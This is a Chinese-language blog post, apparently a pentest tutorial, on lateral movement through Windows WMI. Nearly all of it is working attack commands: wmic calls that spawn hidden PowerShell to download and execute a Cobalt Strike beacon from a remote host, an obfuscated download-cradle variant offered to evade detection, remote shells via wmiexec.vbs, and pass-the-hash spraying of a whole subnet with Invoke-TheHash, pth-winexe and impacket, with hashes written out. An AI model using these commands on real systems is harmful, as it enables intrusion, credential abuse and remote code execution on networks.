WMI横向移动

在这里插入图片描述

0x01 WMI横向移动简介

简介

WMI全称“windows管理规范”,从win2003开始一直存在。它原本的作用是方便管理员对windows主机进行管理。因此在内网渗透中,我们可以使用WMI进行横向移动。

利用条件

1、WMI服务开启,端口135,默认开启。
2、防火墙允许135、445等端口通信。

0x02 windows自带wmic工具横向移动(推荐)

实际测试(wmic)
08 -> 03 不成功
03 -> 08 成功
08 -> 08 成功

wmic实现CS beacon上线

方式1(Scripted Web Delivery):

wmic /NODE:192.168.3.123 /user:"administrator" /password:"Aatest" PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.86:80/a'))\""

在这里插入图片描述
在这里插入图片描述

方式2(payload generator):
1、通过生成powershell的“payload generator”
在这里插入图片描述

2、本地可以使用python开启web server,以便于powershell加载payload。
在这里插入图片描述

3、通过下列命令加载执行powershell。(payload后缀改为txt也可正常上线。)

wmic /NODE:192.168.3.123 /user:"administrator" /password:"Aatest" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/payload.ps1');\""

在这里插入图片描述

小tips:
powershell执行的时候可以加一些混淆,能够起到一定程度上的bypass效果。

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/payload.txt');"
powershell -nop -exec bypass -c "('IEX'+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.3'+'.86:8000/'+'payl'+'o'+'a'+'d.'+'txt1v'+'c)'+';').REplaCE('1vc',[STRing][CHAR]39)|IeX"

在这里插入图片描述
CS正常上线。

0x03 通过外部工具实现WMI横向移动

一、wmiexec.vbs(推荐)

此脚本无论是在域环境下还是在工作组环境下都可正常使用。使用域账号或本地账号均可。
反弹shell:

cscript wmiexec.vbs /shell 192.168.3.123 administrator Aatest	//此处使用普通用户

在这里插入图片描述

命令执行:

cscript wmiexec.vbs /cmd 192.168.3.123 ggyao\administrator Aatest "ipconfig"	//此处使用域用户

在这里插入图片描述

二、Invoke-TheHash.ps1(推荐,批量)

使用已知管理员hash,批量撞指定网段机器,此方式同时适用于工作组和域环境。需要同时加载Invoke-WMIExec.ps1、Invoke-TheHash.ps1。(https://github.com/Kevin-Robertson/Invoke-TheHash)
1、将powershell脚本放到内网一台机器上,用python开一个web server。
在这里插入图片描述

2、加载脚本。

powershell -exec bypass
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');

在这里插入图片描述

3、利用已有管理员hash,批量撞指定网段机器。
域环境下:

PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain ggyao -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10

在这里插入图片描述

工作组环境下:

PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4

在这里插入图片描述

三、kali自带pth工具集(推荐)

工作组环境下(本地管理员):

pth-winexe  -U administrator%Aatest --system --ostype=1 //192.168.3.90 cmd

在这里插入图片描述

域环境下(域管用户):

pth-winexe  -U ggyao/administrator%Aatest --system --ostype=1 //192.168.3.90 cmd

在这里插入图片描述

四、wmicmd命令回显(工作组)

(https://github.com/nccgroup/WMIcmd)
主要用于工作组横向移动。

WMIcmd.exe -h 192.168.3.108 -u administrator -p Aatest -d . -c "ipconfig"

五、impacket套件

impacket套件是通过445端口进行通信的,不是135端口。
windows下:
(https://github.com/maaaaz/impacket-examples-windows)

域用户
wmiexec.exe -hashes :518B98AD4178A53695DC997AA02D455C 域名/administrator@192.168.3.123 "ipconfig"

Linux下:

工作组
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c administrator@192.168.3.123 "ipconfig" 
域用户
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c 域名/administrator@192.168.3.123 "ipconfig" 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值